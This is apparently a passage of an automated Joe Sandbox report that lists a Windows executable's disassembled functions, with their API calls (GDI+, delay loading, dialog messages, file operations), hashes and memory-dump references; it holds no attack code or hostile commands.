                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2211380416-0
                                                                                                                    • Opcode ID: c5ea0daaa4ce30746ea06230f3d65e8a7c06f487716d4a391b03015d16f66212
                                                                                                                    • Instruction ID: 279ded5ea5e4795d0caa4f5bb17985363d2cba7facbbf6b4d33202e720e69167
                                                                                                                    • Opcode Fuzzy Hash: c5ea0daaa4ce30746ea06230f3d65e8a7c06f487716d4a391b03015d16f66212
                                                                                                                    • Instruction Fuzzy Hash: 4CD01211A011546ADE11B339785A7FE2E868FC6315F0D74A5F149771D2CA6848CAA261
                                                                                                                    Function 00E4A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00E4A62C
                                                                                                                      • Part of subcall function 00E4A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E4A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1915507550-0
                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction ID: fcfa118451fabd4bafc22f7157b8f30fa063b3cd6bf64455f0bdc57aaa96e8c2
                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction Fuzzy Hash: 27D0A77024020876DF016F22AC0297E75D5EB00354F089035B841E5142EAB1D9109256
                                                                                                                    Function 00E4E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 00E4E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DloadProtectSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2203082970-0
                                                                                                                    • Opcode ID: 35ea1487a740c932b02d63bcb45b54eade99eebecc3ad69ade4a9bb1f6b08322
                                                                                                                    • Instruction ID: 35a39d6a6df82e45007cce6cfbc3fa816e088cb5e491a4fea68462e66ae28909
                                                                                                                    • Opcode Fuzzy Hash: 35ea1487a740c932b02d63bcb45b54eade99eebecc3ad69ade4a9bb1f6b08322
                                                                                                                    • Instruction Fuzzy Hash: A6D012B07C42419FDB09EBADB8467597394B324759F952183F145F1791DBA84884C605
                                                                                                                    Function 00E4DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00E41B3E), ref: 00E4DD92
                                                                                                                      • Part of subcall function 00E4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4B579
                                                                                                                      • Part of subcall function 00E4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B58A
                                                                                                                      • Part of subcall function 00E4B568: IsDialogMessageW.USER32(0001047E,?), ref: 00E4B59E
                                                                                                                      • Part of subcall function 00E4B568: TranslateMessage.USER32(?), ref: 00E4B5AC
                                                                                                                      • Part of subcall function 00E4B568: DispatchMessageW.USER32(?), ref: 00E4B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 897784432-0
                                                                                                                    • Opcode ID: c54d83b49c1f18e32f61eec11698e6ea450612a2fc0ebc2e57125e7fe38b06c8
                                                                                                                    • Instruction ID: 9da8ef14749fcada0b945a108e6a0b0dc30dc6a26e95177a8dec1f3121158543
                                                                                                                    • Opcode Fuzzy Hash: c54d83b49c1f18e32f61eec11698e6ea450612a2fc0ebc2e57125e7fe38b06c8
                                                                                                                    • Instruction Fuzzy Hash: CCD09E31144300BED6016B52DE06F0A7AE6AB98B08F004956B388740F286B29D61EB15
                                                                                                                    Function 00E398BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(000000FF,00E397BE), ref: 00E398C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: c120462ca46a6cf977d004baf4769a23747f579b07e7977176858ba8054c4f0d
                                                                                                                    • Instruction ID: b18a7f425966b496a8ce79acb2fbffaf17753b26d5574194573cdae43e865818
                                                                                                                    • Opcode Fuzzy Hash: c120462ca46a6cf977d004baf4769a23747f579b07e7977176858ba8054c4f0d
                                                                                                                    • Instruction Fuzzy Hash: 50C00234404205958E655635984D095BB51AB933A9BB4A694D069950B2C362CC5BEF11
                                                                                                                    Function 00E4E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 36060c1292028eb38d1e24a494cb7371b3d40df3f7ef5ec8cd32b31800afa7a4
                                                                                                                    • Instruction ID: e1c80145708abe9c1f50d0703cd34c6f058d77c86902f2f4b5cd7b4962ceff48
                                                                                                                    • Opcode Fuzzy Hash: 36060c1292028eb38d1e24a494cb7371b3d40df3f7ef5ec8cd32b31800afa7a4
                                                                                                                    • Instruction Fuzzy Hash: 63B092A5298100AC2508A5157902C3A0248D0C4B10330B12AB805F1280D84048040532
                                                                                                                    Function 00E4E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3950bf7e189be96273f279795e2ac5b9bb88a5dad9274e56569829419958040c
                                                                                                                    • Instruction ID: f49ceef2bb3678ac328768acc2a2ebf379329734a1ae728d9aa1274f5149156a
                                                                                                                    • Opcode Fuzzy Hash: 3950bf7e189be96273f279795e2ac5b9bb88a5dad9274e56569829419958040c
                                                                                                                    • Instruction Fuzzy Hash: 2FB092A5298100BC2508A5147906C3A0248D0C4F10330B02AB805F1280E8404E000532
                                                                                                                    Function 00E4E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 5096aca86dd80cf25ccbe836c45718e9de415f2176103587e07c7b1f21aadc29
                                                                                                                    • Instruction ID: 2ffd49e22494494c44e493880eb97230f5eb1fbf450dd1ade7b6ffd54738e741
                                                                                                                    • Opcode Fuzzy Hash: 5096aca86dd80cf25ccbe836c45718e9de415f2176103587e07c7b1f21aadc29
                                                                                                                    • Instruction Fuzzy Hash: 7EB092A1298100AC2508A5157A02C7B0248D0C4B10330B12AB505F1280984008090532
                                                                                                                    Function 00E4E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 708c57f5f5b2b99125024bae49622a6b51208157499f19d67cde13dcecf11ea5
                                                                                                                    • Instruction ID: c0f69ec1f1118ba3c55f99038bc40cb3e5713f7de37bfe92ce90c28966de6943
                                                                                                                    • Opcode Fuzzy Hash: 708c57f5f5b2b99125024bae49622a6b51208157499f19d67cde13dcecf11ea5
                                                                                                                    • Instruction Fuzzy Hash: FDA011E22A8202BC300CBA00BE02C3B020CE0C0F20330B02EF822B0280AC8008000832
                                                                                                                    Function 00E4E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 628627d10c84e061dcaa604d6698684b37361a377644076b9016745837c96aca
                                                                                                                    • Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
                                                                                                                    • Opcode Fuzzy Hash: 628627d10c84e061dcaa604d6698684b37361a377644076b9016745837c96aca
                                                                                                                    • Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
                                                                                                                    Function 00E4E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: b14c74acc882ea65df65f73076db0500d6e8407ce6746129ff31ac8cc4cf753f
                                                                                                                    • Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
                                                                                                                    • Opcode Fuzzy Hash: b14c74acc882ea65df65f73076db0500d6e8407ce6746129ff31ac8cc4cf753f
                                                                                                                    • Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
                                                                                                                    Function 00E4E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: e6c09c51c2a9d696effc9d054f5df1bb17fc0f832447fbf2fd0cd7caacd65b0c
                                                                                                                    • Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
                                                                                                                    • Opcode Fuzzy Hash: e6c09c51c2a9d696effc9d054f5df1bb17fc0f832447fbf2fd0cd7caacd65b0c
                                                                                                                    • Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
                                                                                                                    Function 00E4E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 791c033120ed820aa58fe12fcd587b9a8b17a6e3d19844a8aa718c68092bb588
                                                                                                                    • Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
                                                                                                                    • Opcode Fuzzy Hash: 791c033120ed820aa58fe12fcd587b9a8b17a6e3d19844a8aa718c68092bb588
                                                                                                                    • Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
                                                                                                                    Function 00E4E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E3FC
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: dcb85cde3269f1e137abff0ed71d1f50a94e8168576ad7d3d4f6fa3973efeb6c
                                                                                                                    • Instruction ID: 3dc8ee5f58b6795a9ee25afc859d2e333cf8718fb192510014779ab8eaa1a5c2
                                                                                                                    • Opcode Fuzzy Hash: dcb85cde3269f1e137abff0ed71d1f50a94e8168576ad7d3d4f6fa3973efeb6c
                                                                                                                    • Instruction Fuzzy Hash: D4A001E62A9252BC350DBA51BE06C7B025DE4C9FA1334B92EF856B5681A88018451976
                                                                                                                    Function 00E39F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,00E3903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00E39F0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
